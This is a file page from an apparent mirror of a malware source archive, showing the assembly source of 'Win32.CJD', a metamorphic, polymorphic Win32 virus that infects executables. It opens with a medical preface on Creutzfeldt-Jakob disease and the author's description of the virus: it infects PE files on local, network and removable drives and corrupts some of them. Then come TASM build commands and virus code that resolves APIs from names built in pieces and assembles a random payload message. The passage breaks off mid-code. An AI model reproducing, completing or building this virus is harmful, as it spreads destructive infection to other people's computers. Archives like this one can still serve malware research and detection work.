mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 05:15:28 +00:00
12103 lines
435 KiB
NASM
12103 lines
435 KiB
NASM
;
|
|
;
|
|
; CREUTZFELDT-JAKOB DISEASE BioCoded by Neurobasher/Germany
|
|
; ---------------------------------------------------------
|
|
;
|
|
;
|
|
;
|
|
;
|
|
; Index:
|
|
; ------
|
|
;
|
|
; 1 - About the biological version
|
|
; 2 - Author's description
|
|
; 3 - [WIN32.CJD] source code
|
|
;
|
|
;
|
|
;
|
|
;
|
|
; 1 - About the biological version
|
|
; --------------------------------
|
|
;
|
|
;
|
|
;---------------------------------------
|
|
;What is Bovine Spongiform Encephalopaty
|
|
;---------------------------------------
|
|
;
|
|
;BSE is a progressive, fatal neurologic disorder of cattle and is classified as one of the transmissible
|
|
;spongiform encephalopathies, a group of diseases of animals and humans believed to be caused by abnormally
|
|
;folded proteins called prions. The disease itself is known since 1920 and is often called the 'mad cow disease'.
|
|
;BSE was first identified in 1986 in the United Kingdom (UK), where it caused a large outbreak
|
|
;among cattle. Although the source of the BSE epizootic agent is uncertain, feeding cattle BSE-contaminated
|
|
;meat-and-bone meal is the major contributory factor to the amplification of BSE among cattle. Since 1986,
|
|
;BSE cases have been identified in 20 European countries, Japan, Israel, and Canada.
|
|
;
|
|
;The appearance of the new variant of CJD in several younger than average people in Great Britain and France
|
|
;has led to concern that BSE may be transmitted to humans through consumption of contaminated beef. Although
|
|
;laboratory tests have shown a strong similarity between the prions causing BSE and CJD, there is no direct
|
|
;proof to support this theory.
|
|
;
|
|
;----------------------------------
|
|
;What is Creutzfeldt-Jakob Disease?
|
|
;----------------------------------
|
|
;
|
|
;Creutzfeldt-Jakob disease (CJD) is a rare, degenerative, invariably fatal brain disorder.
|
|
;Typically, onset of symptoms occurs at about age 60.. There are three major categories of CJD:
|
|
;sporadic CJD, hereditary CJD, and acquired CJD. There is currently no single diagnostic test for CJD.
|
|
;The first concern is to rule out treatable forms of dementia such as encephalitis or chronic meningitis.
|
|
;The only way to confirm a diagnosis of CJD is by brain biopsy or autopsy. In a brain biopsy,
|
|
;a neurosurgeon removes a small piece of tissue from the patient's brain so that is can be examined
|
|
;by a neurologist. Because a correct diagnosis of CJD does not help the patient, a brain biopsy
|
|
;is discouraged unless it is need to rule out a treatable disorder. While CJD can be transmitted to
|
|
;other people, the risk of this happening is extremely small.
|
|
;
|
|
;There is no treatment that can cure or control CJD. Current treatment is aimed at alleviating symptoms
|
|
;and making the patient as comfortable as possible. Opiate drugs can help relieve pain, and the drugs
|
|
;clonazepam and sodium valproate may help relieve involuntary muscle jerks.
|
|
;
|
|
;About 90 percent of patients die within 1 year. In the early stages of disease, patients may have
|
|
;failing memory, behavioral changes, lack of coordination and visual disturbances. As the illness progresses,
|
|
;mental deterioration becomes pronounced and involuntary movements, blindness, weakness of extremities,
|
|
;and coma may occur.
|
|
;
|
|
;The leading scientific theory at this time maintains that CJD is caused by a type of protein called a prion.
|
|
;The harmless and the infectious forms of the prion protein are nearly identical, but the infectious form
|
|
;takes a different folded shape than the normal protein. Researchers are examining whether the transmissible
|
|
;agent is, in fact, a prion and trying to discover factors that influence prion infectivity and how the disorder
|
|
;damages the brain. Using rodent models of the disease and brain tissue from autopsies, they are also trying to
|
|
;identify factors that influence the susceptibility to the disease and that govern when in life the disease appears.
|
|
;
|
|
;
|
|
;
|
|
; 2 - Authors description
|
|
; -----------------------
|
|
;
|
|
;It is a very complex parasitic highly polymorphic Win32 virus that uses the entry-point ;obscuring technique.
|
|
;The virus uses a metamorphic engine and permutates its code.
|
|
;The virus infects Windows executable files (Win32 PE EXE). When run
|
|
;the virus searches for these files and randomly infects them by different infection sheme.
|
|
;The virus searches for Win32 PE executable files in the current and five levels upper
|
|
;directories, also on the available network and removable media and in the directories if
|
|
;their names not begin with "W", and infects them. The virus doesn't infect files if their
|
|
;names begin with several suspicious caracters like anti*,...
|
|
;
|
|
;or if the name contains the 'V' letter, and depending on the random counter value.
|
|
;While infecting files the virus rebuilds and encrypts its body and writes it to one of the
|
|
;host file's sections. Then, it searches for and replaces one of the calls to the
|
|
;"ExitProcess" function in the host's code section with the call to the viral code.
|
|
;Several functions depends on randomness and are mutated from generation to generation also.
|
|
;
|
|
;Payload
|
|
;Depending on the system date the virus displays various messages
|
|
;There's a really small chance the virus allows multipe infections of the files.
|
|
;This files were corrupted and won't work anymore.
|
|
;
|
|
;
|
|
; 3 - Win32 source code
|
|
; ---------------------
|
|
; bugfixed vers.
|
|
;
|
|
; To get first generation file use TASM 5.0r
|
|
; c:\tasm32 -ml -m9 -q cjdiseae.asm
|
|
; c:\tlink32 -Tpe -c -x -aa -r cjdisease.obj,,,import32
|
|
;
|
|
|
|
.386p
|
|
.model flat
|
|
locals
|
|
|
|
.code
|
|
ret
|
|
.data
|
|
|
|
|
|
AddressToFree dd 0
|
|
|
|
extrn ExitProcess:PROC
|
|
extrn VirtualAlloc:PROC
|
|
extrn VirtualFree:PROC
|
|
extrn GetModuleHandleA:PROC
|
|
extrn GetProcAddress:PROC
|
|
extrn MessageBoxA:PROC
|
|
|
|
|
|
PreMain proc
|
|
push 4
|
|
push 1000h
|
|
push 350000h
|
|
push 0
|
|
call VirtualAlloc
|
|
or eax, eax
|
|
jz @@Error
|
|
mov ebp, eax
|
|
|
|
mov [AddressToFree], eax
|
|
mov ebx, eax
|
|
mov esi, offset Main
|
|
mov edi, eax
|
|
mov ecx, offset EndOfCode
|
|
sub ecx, offset Main
|
|
rep movsb ; Copy virus
|
|
|
|
push __DISASM2_SECTION
|
|
push __DATA_SECTION
|
|
push __BUFFERS_SECTION
|
|
push __DISASM_SECTION
|
|
push __CODE_SECTION
|
|
mov eax, offset GetProcAddress
|
|
mov eax, [eax+2]
|
|
push eax
|
|
mov eax, offset GetModuleHandleA
|
|
mov eax, [eax+2]
|
|
push eax
|
|
push 5*2 ; Bit 0=0: 'A', 1
|
|
call ebx
|
|
|
|
push 0C000h
|
|
push 0
|
|
push dword ptr [AddressToFree]
|
|
call VirtualFree
|
|
@@Error:
|
|
push 0
|
|
jmp @@Dropper
|
|
|
|
title: db ' [Win32.CJD] was done by <<<NEUROBASHER/GERMANY>>> ',0
|
|
body: db ' Creutzfeldt-Jakob Disease ',0ah,0dh
|
|
db ' rare, degenerative, invariably fatal brain disorder. ',0ah,0dh
|
|
db ' ------------- ',0ah,0dh
|
|
db ' [BSE] Bovine Spongiform Encephalopaty ',0ah,0dh
|
|
db ' well known as mad-cow-disease ',0ah,0dh
|
|
db ' ',0ah,0dh
|
|
db ' f i r s t g e n e r a t i o n e x e c u t e d . . . ',0
|
|
|
|
@@Dropper:
|
|
push 0h
|
|
push offset title
|
|
push offset body
|
|
push 0h
|
|
call MessageBoxA
|
|
push 0h
|
|
call ExitProcess
|
|
PreMain endp
|
|
|
|
__CODE_SECTION EQU 000000h
|
|
__DISASM_SECTION EQU 100000h
|
|
__BUFFERS_SECTION EQU 080000h
|
|
__LABEL_SECTION EQU __BUFFERS_SECTION + 00000h
|
|
__VARIABLE_SECTION EQU __BUFFERS_SECTION + 10000h
|
|
__BUFFER1_SECTION EQU __BUFFERS_SECTION + 20000h
|
|
__BUFFER2_SECTION EQU __BUFFERS_SECTION + 30000h
|
|
__VAR_MARKS_SECTION EQU __BUFFERS_SECTION + 40000h
|
|
__DATA_SECTION EQU 0E0000h
|
|
__DISASM2_SECTION EQU 200000h
|
|
|
|
NumberOfLabels EQU __DATA_SECTION + 0000h
|
|
NumberOfInstructions EQU __DATA_SECTION + 0008h
|
|
InstructionTable EQU __DATA_SECTION + 0010h
|
|
LabelTable EQU __DATA_SECTION + 0018h
|
|
FutureLabelTable EQU __DATA_SECTION + 0020h
|
|
PathMarksTable EQU __DATA_SECTION + 0028h
|
|
NumberOfLabelsPost EQU __DATA_SECTION + 0030h
|
|
AddressOfLastInstruction EQU __DATA_SECTION + 0038h
|
|
VariableTable EQU __DATA_SECTION + 0040h
|
|
NumberOfVariables EQU __DATA_SECTION + 0048h
|
|
FramesTable EQU __DATA_SECTION + 0050h
|
|
PermutationResult EQU __DATA_SECTION + 0058h
|
|
JumpsTable EQU __DATA_SECTION + 0060h
|
|
AddressOfLastFrame EQU __DATA_SECTION + 0068h
|
|
PositionOfFirstInstruction EQU __DATA_SECTION + 0070h
|
|
MODValue EQU __DATA_SECTION + 0078h
|
|
NumberOfJumps EQU __DATA_SECTION + 0080h
|
|
RndSeed1 EQU __DATA_SECTION + 0088h
|
|
RndSeed2 EQU __DATA_SECTION + 0090h
|
|
ExpansionResult EQU __DATA_SECTION + 0098h
|
|
Register8Bits EQU __DATA_SECTION + 00A0h
|
|
Xp_Register0 EQU __DATA_SECTION + 00A8h
|
|
Xp_Register1 EQU __DATA_SECTION + 00B0h
|
|
Xp_Register2 EQU __DATA_SECTION + 00B8h
|
|
Xp_Register3 EQU __DATA_SECTION + 00C0h
|
|
Xp_Register4 EQU __DATA_SECTION + 00C8h
|
|
Xp_Register5 EQU __DATA_SECTION + 00D0h
|
|
Xp_Register6 EQU __DATA_SECTION + 00D8h
|
|
Xp_Register7 EQU __DATA_SECTION + 00E0h
|
|
DeltaRegister EQU __DATA_SECTION + 00E8h
|
|
Xp_8Bits EQU __DATA_SECTION + 00F0h
|
|
Xp_Operation EQU __DATA_SECTION + 00F8h
|
|
Xp_Register EQU __DATA_SECTION + 0100h
|
|
Xp_Mem_Index1 EQU __DATA_SECTION + 0108h
|
|
Xp_Mem_Index2 EQU __DATA_SECTION + 0110h
|
|
Xp_Mem_Addition EQU __DATA_SECTION + 0118h
|
|
Xp_Immediate EQU __DATA_SECTION + 0120h
|
|
Xp_SrcRegister EQU __DATA_SECTION + 0128h
|
|
Xp_FlagRegOrMem EQU __DATA_SECTION + 0130h
|
|
Xp_RecurseLevel EQU __DATA_SECTION + 0138h
|
|
Xp_LEAAdditionFlag EQU __DATA_SECTION + 0140h
|
|
VarMarksTable EQU __DATA_SECTION + 0148h
|
|
_BUFFERS_SECTION EQU __DATA_SECTION + 0150h
|
|
_CODE_SECTION EQU __DATA_SECTION + 0158h
|
|
_DISASM_SECTION EQU __DATA_SECTION + 0160h
|
|
_LABEL_SECTION EQU __DATA_SECTION + 0168h
|
|
_VARIABLE_SECTION EQU __DATA_SECTION + 0170h
|
|
_BUFFER1_SECTION EQU __DATA_SECTION + 0178h
|
|
_BUFFER2_SECTION EQU __DATA_SECTION + 0180h
|
|
_VAR_MARKS_SECTION EQU __DATA_SECTION + 0188h
|
|
_DATA_SECTION EQU __DATA_SECTION + 0190h
|
|
_DISASM2_SECTION EQU __DATA_SECTION + 0198h
|
|
New_CODE_SECTION EQU __DATA_SECTION + 01A0h
|
|
New_DISASM_SECTION EQU __DATA_SECTION + 01A8h
|
|
New_BUFFERS_SECTION EQU __DATA_SECTION + 01B0h
|
|
; New_LABEL_SECTION EQU __DATA_SECTION + 01B0h
|
|
; New_VARIABLE_SECTION EQU __DATA_SECTION + 01B8h
|
|
; New_BUFFER1_SECTION EQU __DATA_SECTION + 01C0h
|
|
; New_BUFFER2_SECTION EQU __DATA_SECTION + 01C8h
|
|
; New_VAR_MARKS_SECTION EQU __DATA_SECTION + 01D0h
|
|
New_DATA_SECTION EQU __DATA_SECTION + 01D8h
|
|
New_DISASM2_SECTION EQU __DATA_SECTION + 01E0h
|
|
RVA_GetModuleHandle EQU __DATA_SECTION + 01E8h
|
|
RVA_GetProcAddress EQU __DATA_SECTION + 01F0h
|
|
FlagAorW EQU __DATA_SECTION + 01F8h
|
|
ReturnValue EQU __DATA_SECTION + 0200h
|
|
hKernel EQU __DATA_SECTION + 0208h
|
|
hUser32 EQU __DATA_SECTION + 0210h
|
|
RVA_CreateFileA EQU __DATA_SECTION + 0218h
|
|
RVA_CreateFileMappingA EQU __DATA_SECTION + 0220h
|
|
RVA_MapViewOfFile EQU __DATA_SECTION + 0228h
|
|
RVA_UnmapViewOfFile EQU __DATA_SECTION + 0230h
|
|
RVA_GetFileSize EQU __DATA_SECTION + 0238h
|
|
RVA_GetFileAttributesA EQU __DATA_SECTION + 0240h
|
|
RVA_SetFileAttributesA EQU __DATA_SECTION + 0248h
|
|
RVA_SetFilePointer EQU __DATA_SECTION + 0250h
|
|
RVA_SetFileTime EQU __DATA_SECTION + 0258h
|
|
RVA_SetEndOfFile EQU __DATA_SECTION + 0260h
|
|
RVA_FindFirstFileA EQU __DATA_SECTION + 0268h
|
|
RVA_FindNextFileA EQU __DATA_SECTION + 0270h
|
|
RVA_FindClose EQU __DATA_SECTION + 0278h
|
|
RVA_CloseHandle EQU __DATA_SECTION + 0280h
|
|
RVA_MessageBoxA EQU __DATA_SECTION + 0288h
|
|
NewLabelTable EQU __DATA_SECTION + 0290h
|
|
Asm_ByteToSort EQU __DATA_SECTION + 0298h
|
|
JumpRelocationTable EQU __DATA_SECTION + 02A0h
|
|
NumberOfJumpRelocations EQU __DATA_SECTION + 02A8h
|
|
Permut_LastInstruction EQU __DATA_SECTION + 02B0h
|
|
TranslatedDeltaRegister EQU __DATA_SECTION + 02B8h
|
|
hFile EQU __DATA_SECTION + 02C0h
|
|
FileSize EQU __DATA_SECTION + 02C8h
|
|
OriginalFileSize EQU __DATA_SECTION + 02D0h
|
|
hMapping EQU __DATA_SECTION + 02D8h
|
|
MappingAddress EQU __DATA_SECTION + 02E0h
|
|
HeaderAddress EQU __DATA_SECTION + 02E8h
|
|
StartOfSectionHeaders EQU __DATA_SECTION + 02F0h
|
|
RelocHeader EQU __DATA_SECTION + 02F8h
|
|
TextHeader EQU __DATA_SECTION + 0300h
|
|
DataHeader EQU __DATA_SECTION + 0308h
|
|
RVA_TextHole EQU __DATA_SECTION + 0310h
|
|
Phys_TextHole EQU __DATA_SECTION + 0318h
|
|
TextHoleSize EQU __DATA_SECTION + 0320h
|
|
RVA_DataHole EQU __DATA_SECTION + 0328h
|
|
Phys_DataHole EQU __DATA_SECTION + 0330h
|
|
MakingFirstHole EQU __DATA_SECTION + 0338h
|
|
ExitProcessAddress EQU __DATA_SECTION + 0340h
|
|
GetModuleHandleAddress EQU __DATA_SECTION + 0348h
|
|
GetProcAddressAddress EQU __DATA_SECTION + 0350h
|
|
VirtualAllocAddress EQU __DATA_SECTION + 0358h
|
|
GetModuleHandleMode EQU __DATA_SECTION + 0360h
|
|
VirtualPositionOfVar EQU __DATA_SECTION + 0368h
|
|
PhysicalPositionOfVar EQU __DATA_SECTION + 0370h
|
|
Kernel32Imports EQU __DATA_SECTION + 0378h
|
|
hFindFile EQU __DATA_SECTION + 0380h
|
|
Addr_FilePath EQU __DATA_SECTION + 0388h
|
|
FileAttributes EQU __DATA_SECTION + 0390h
|
|
SizeOfNewCode EQU __DATA_SECTION + 0398h
|
|
FindFileData EQU __DATA_SECTION + 03A0h
|
|
OtherBuffers EQU __DATA_SECTION + 03A8h
|
|
RoundedSizeOfNewCode EQU __DATA_SECTION + 03B0h
|
|
NewAssembledCode EQU __DATA_SECTION + 03B8h
|
|
NumberOfUndoActions EQU __DATA_SECTION + 03C0h
|
|
LastHeader EQU __DATA_SECTION + 03C8h
|
|
MaxSizeOfDecryptor EQU __DATA_SECTION + 03D0h
|
|
CreatingADecryptor EQU __DATA_SECTION + 03D8h
|
|
DecryptorPseudoCode EQU __DATA_SECTION + 03E0h
|
|
AssembledDecryptor EQU __DATA_SECTION + 03E8h
|
|
Decryptor_DATA_SECTION EQU __DATA_SECTION + 03F0h
|
|
SizeOfExpansion EQU __DATA_SECTION + 03F8h
|
|
SizeOfDecryptor EQU __DATA_SECTION + 0400h
|
|
TypeOfEncryption EQU __DATA_SECTION + 0408h
|
|
EncryptionKey EQU __DATA_SECTION + 0410h
|
|
IndexValue EQU __DATA_SECTION + 0418h
|
|
IndexRegister EQU __DATA_SECTION + 0420h
|
|
BufferRegister EQU __DATA_SECTION + 0428h
|
|
CounterRegister EQU __DATA_SECTION + 0430h
|
|
BufferValue EQU __DATA_SECTION + 0438h
|
|
CounterValue EQU __DATA_SECTION + 0440h
|
|
Poly_FirstPartOfFunction EQU __DATA_SECTION + 0448h
|
|
Poly_SecondPartOfFunction EQU __DATA_SECTION + 0450h
|
|
Poly_ThirdPartOfFunction EQU __DATA_SECTION + 0458h
|
|
AdditionToBuffer EQU __DATA_SECTION + 0460h
|
|
Poly_Jump_ErrorInVirtualAlloc EQU __DATA_SECTION+0468h
|
|
;Index2Register EQU __DATA_SECTION + 0470h
|
|
Poly_LoopLabel EQU __DATA_SECTION + 0478h
|
|
RVA_GetSystemTime EQU __DATA_SECTION + 0480h
|
|
RVA_GetTickCount EQU __DATA_SECTION + 0488h
|
|
RVA_GetDriveTypeA EQU __DATA_SECTION + 0490h
|
|
RVA_GetLogicalDriveStringsA EQU __DATA_SECTION + 0498h
|
|
RVA_SetCurrentDirectoryA EQU __DATA_SECTION + 04A0h
|
|
StartOfEncryptedData EQU __DATA_SECTION + 04A8h
|
|
SizeOfNewCodeP2 EQU __DATA_SECTION + 04B0h
|
|
Poly_InitialValue EQU __DATA_SECTION + 04B8h
|
|
Poly_Addition EQU __DATA_SECTION + 04C0h
|
|
Poly_ExcessJumpInstruction EQU __DATA_SECTION + 04C8h
|
|
DirectoryDeepness EQU __DATA_SECTION + 04D0h
|
|
RVA_GetSystemDefaultLCID EQU __DATA_SECTION + 04D8h
|
|
Poly_JumpRandomExecution EQU __DATA_SECTION + 04E0h
|
|
|
|
Main proc
|
|
; EBP = Delta offset
|
|
pop ebx
|
|
|
|
pop eax
|
|
mov ecx, eax
|
|
and eax, 1
|
|
mov [ebp+FlagAorW], eax
|
|
and ecx, 0FFFFFFFEh
|
|
shr ecx, 1
|
|
mov [ebp+DeltaRegister], ecx
|
|
|
|
pop eax
|
|
mov eax, [eax]
|
|
mov [ebp+RVA_GetModuleHandle], eax
|
|
pop eax
|
|
mov eax, [eax]
|
|
mov [ebp+RVA_GetProcAddress], eax
|
|
pop eax
|
|
and eax, 03FFFFFh
|
|
mov [ebp+_CODE_SECTION], eax
|
|
pop eax
|
|
and eax, 03FFFFFh
|
|
mov [ebp+_DISASM_SECTION], eax
|
|
pop eax
|
|
and eax, 03FFFFFh
|
|
mov [ebp+_BUFFERS_SECTION], eax
|
|
|
|
mov [ebp+_LABEL_SECTION], eax
|
|
add eax, 10000h
|
|
mov [ebp+_VARIABLE_SECTION], eax
|
|
add eax, 10000h
|
|
mov [ebp+_BUFFER1_SECTION], eax
|
|
add eax, 10000h
|
|
mov [ebp+_BUFFER2_SECTION], eax
|
|
add eax, 10000h
|
|
mov [ebp+_VAR_MARKS_SECTION], eax
|
|
|
|
pop eax
|
|
and eax, 03FFFFFh
|
|
mov [ebp+_DATA_SECTION], eax
|
|
pop eax
|
|
and eax, 03FFFFFh
|
|
mov [ebp+_DISASM2_SECTION], eax
|
|
push ebx ; Restore return value
|
|
|
|
|
|
mov edx, [ebp+_BUFFER1_SECTION]
|
|
add edx, ebp
|
|
|
|
push eax
|
|
push ecx
|
|
push edx ; APICALL_BEGIN
|
|
|
|
mov eax, 'nrek'
|
|
mov [edx], eax
|
|
mov eax, '23le'
|
|
mov [edx+4], eax
|
|
mov eax, 'lld.'
|
|
mov [edx+8], eax
|
|
xor eax, eax
|
|
mov [edx+0Ch], eax
|
|
call APICall_GetModuleHandle
|
|
pop edx
|
|
pop ecx
|
|
pop eax
|
|
|
|
mov eax, [ebp+ReturnValue]
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+hKernel], eax
|
|
|
|
push eax
|
|
push ecx
|
|
push edx
|
|
mov eax, 'resu'
|
|
mov [edx], eax
|
|
mov eax, 'd.23'
|
|
mov [edx+4], eax
|
|
mov eax, 'll'
|
|
mov [edx+8], eax
|
|
call APICall_GetModuleHandle
|
|
pop edx
|
|
pop ecx
|
|
pop eax
|
|
|
|
mov eax, [ebp+ReturnValue]
|
|
mov [ebp+hUser32], eax
|
|
|
|
mov edx, [ebp+_BUFFER1_SECTION]
|
|
add edx, ebp
|
|
mov edi, [ebp+hKernel]
|
|
|
|
mov eax, 'aerC'
|
|
mov [edx], eax
|
|
mov eax, 'iFet'
|
|
mov [edx+4], eax
|
|
mov eax, 'Ael'
|
|
mov [edx+8], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_CreateFileA], eax
|
|
|
|
mov eax, 'ppaM'
|
|
mov [edx+0Ah], eax
|
|
mov eax, 'Agni'
|
|
mov [edx+0Eh], eax
|
|
xor eax, eax
|
|
mov [edx+12h], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_CreateFileMappingA], eax
|
|
|
|
add edx, 2
|
|
mov eax, 'VpaM'
|
|
mov [edx], eax
|
|
mov eax, 'Owei'
|
|
mov [edx+4], eax
|
|
mov eax, 'liFf'
|
|
mov [edx+8], eax
|
|
mov eax, 'e'
|
|
mov [edx+0Ch], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_MapViewOfFile], eax
|
|
|
|
sub edx, 2
|
|
mov eax, 'amnU'
|
|
mov [edx], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_UnmapViewOfFile], eax
|
|
|
|
mov eax, 'SteG'
|
|
mov [edx], eax
|
|
mov eax, 'etsy'
|
|
mov [edx+4], eax
|
|
mov eax, 'miTm'
|
|
mov [edx+8], eax
|
|
mov eax, 'e'
|
|
mov [edx+0Ch], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_GetSystemTime], eax
|
|
|
|
mov eax, 'virD'
|
|
mov [edx+3], eax
|
|
mov eax, 'pyTe'
|
|
mov [edx+7], eax
|
|
mov eax, 'Ae'
|
|
mov [edx+0Bh], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_GetDriveTypeA], eax
|
|
|
|
mov eax, 'igoL'
|
|
mov [edx+3], eax
|
|
mov eax, 'Dlac'
|
|
mov [edx+7], eax
|
|
mov eax, 'evir'
|
|
mov [edx+0Bh], eax
|
|
mov eax, 'irtS'
|
|
mov [edx+0Fh], eax
|
|
mov eax, 'Asgn'
|
|
mov [edx+13h], eax
|
|
xor eax, eax
|
|
mov [edx+17h], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_GetLogicalDriveStringsA], eax
|
|
|
|
mov eax, 'tsyS'
|
|
mov [edx+3], eax
|
|
mov eax, 'eDme'
|
|
mov [edx+7], eax
|
|
mov eax, 'luaf'
|
|
mov [edx+0Bh], eax
|
|
mov eax, 'ICLt'
|
|
mov [edx+0Fh], eax
|
|
mov eax, 'D'
|
|
mov [edx+13h], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_GetSystemDefaultLCID], eax
|
|
|
|
mov eax, 'CteS'
|
|
mov [edx], eax
|
|
mov eax, 'erru'
|
|
mov [edx+4], eax
|
|
mov eax, 'iDtn'
|
|
mov [edx+8], eax
|
|
mov eax, 'tcer'
|
|
mov [edx+0Ch], eax
|
|
mov eax, 'Ayro'
|
|
mov [edx+10h], eax
|
|
xor eax, eax
|
|
mov [edx+14h], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_SetCurrentDirectoryA], eax
|
|
|
|
mov eax, 'FteG'
|
|
mov [edx], eax
|
|
mov eax, 'Seli'
|
|
mov [edx+4], eax
|
|
mov eax, 'ezi'
|
|
mov [edx+8], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_GetFileSize], eax
|
|
|
|
mov eax, 'rttA'
|
|
mov [edx+7], eax
|
|
mov eax, 'tubi'
|
|
mov [edx+0Bh], eax
|
|
mov eax, 'Ase'
|
|
mov [edx+0Fh], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_GetFileAttributesA], eax
|
|
|
|
mov eax, 'FteS'
|
|
mov [edx], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_SetFileAttributesA], eax
|
|
|
|
mov eax, 'nioP'
|
|
mov [edx+7], eax
|
|
mov eax, 'ret'
|
|
mov [edx+0Bh], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_SetFilePointer], eax
|
|
|
|
mov eax, 'emiT'
|
|
mov [edx+7], eax
|
|
xor eax, eax
|
|
mov [edx+0Bh], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_SetFileTime], eax
|
|
|
|
mov eax, 'OdnE'
|
|
mov [edx+3], eax
|
|
mov eax, 'liFf'
|
|
mov [edx+7], eax
|
|
mov eax, 'e'
|
|
mov [edx+0Bh], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_SetEndOfFile], eax
|
|
|
|
mov eax, 'dniF'
|
|
mov [edx], eax
|
|
mov eax, 'sriF'
|
|
mov [edx+4], eax
|
|
mov eax, 'liFt'
|
|
mov [edx+8], eax
|
|
mov eax, 'Ae'
|
|
mov [edx+0Ch], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_FindFirstFileA], eax
|
|
|
|
mov eax, 'txeN'
|
|
mov [edx+4], eax
|
|
mov eax, 'eliF'
|
|
mov [edx+8], eax
|
|
mov eax, 'A'
|
|
mov [edx+0Ch], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_FindNextFileA], eax
|
|
|
|
mov eax, 'solC'
|
|
mov [edx+4], eax
|
|
mov eax, 'e'
|
|
mov [edx+8], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_FindClose], eax
|
|
|
|
add edx, 4
|
|
mov eax, 'dnaH'
|
|
mov [edx+5], eax
|
|
mov eax, 'el'
|
|
mov [edx+9], eax
|
|
call GetFunction
|
|
or eax, eax
|
|
jz @@Error
|
|
mov [ebp+RVA_CloseHandle], eax
|
|
|
|
sub edx, 4
|
|
mov edi, [ebp+hUser32]
|
|
mov eax, 'sseM'
|
|
mov [edx], eax
|
|
mov eax, 'Bega'
|
|
mov [edx+4], eax
|
|
mov eax, 'Axo'
|
|
mov [edx+8], eax
|
|
call GetFunction
|
|
mov [ebp+RVA_MessageBoxA], eax
|
|
|
|
|
|
|
|
push eax
|
|
push ecx
|
|
push edx
|
|
|
|
mov eax, [ebp+_BUFFER1_SECTION]
|
|
add eax, ebp
|
|
push eax
|
|
call dword ptr [ebp+RVA_GetSystemTime]
|
|
|
|
pop edx
|
|
pop ecx
|
|
pop eax
|
|
|
|
mov ebx, [ebp+_BUFFER1_SECTION]
|
|
add ebx, ebp
|
|
mov eax, [ebx+04h]
|
|
add eax, [ebx+0Ch]
|
|
mov [ebp+RndSeed1], eax
|
|
add eax, [ebx+08h]
|
|
mov [ebp+RndSeed2], eax
|
|
|
|
mov eax, [ebp+RVA_MessageBoxA]
|
|
or eax, eax
|
|
jz @@NoPayload
|
|
|
|
|
|
|
|
;; Simple, silly MessageBox with a partly metamorphic message :)
|
|
|
|
mov edx, [ebp+_BUFFER1_SECTION]
|
|
add edx, ebp
|
|
mov eax, [edx+2]
|
|
and eax, 0FFh
|
|
@@ChoosePayload:
|
|
call Random
|
|
and eax, 3
|
|
cmp eax, 1
|
|
je @@CheckPayload
|
|
cmp eax, 2
|
|
je @@CheckPayload2
|
|
cmp eax, 3
|
|
je @@CheckPayload3
|
|
cmp eax, 0
|
|
je @@EndPayload
|
|
@@CheckPayload:
|
|
call Random
|
|
and eax, 03Fh
|
|
jnz @@EndPayload
|
|
push edx
|
|
call Random
|
|
and eax, 00000000h
|
|
add eax, 'DJC[' ;; "[CJD"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 20200000h
|
|
add eax, 'RC ]' ;; "] CR"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 20202020h
|
|
add eax, 'ZTUE' ;; "EUTZ"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 20202020h
|
|
add eax, 'DLEF' ;; "FELD"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 20200020h
|
|
add eax, 'AJ-T' ;; "T-JA"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 00202020h
|
|
add eax, ' BOK' ;; "KOB "
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 20202020h
|
|
add eax, 'ESID' ;; "DISE"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 00202020h
|
|
add eax, ' ESA' ;; "ASE "
|
|
mov [edx], eax
|
|
call Random
|
|
and eax, 2
|
|
jnz @@TruncatePayload
|
|
add edx, 4
|
|
call Random
|
|
and eax, 00000000h
|
|
add eax, ' )c(' ;; " (c)"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 00000000h
|
|
add eax, 'N yb' ;; "by N"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 00000000h
|
|
add eax, 'orue' ;; "euro"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 00000000h
|
|
add eax, 'hsab' ;; "bash"
|
|
mov [edx], eax
|
|
add edx, 4
|
|
call Random
|
|
and eax, 00000000h
|
|
add eax, 'G/re' ;; "er/G"
|
|
mov [edx], eax
|
|
add edx, 4
|
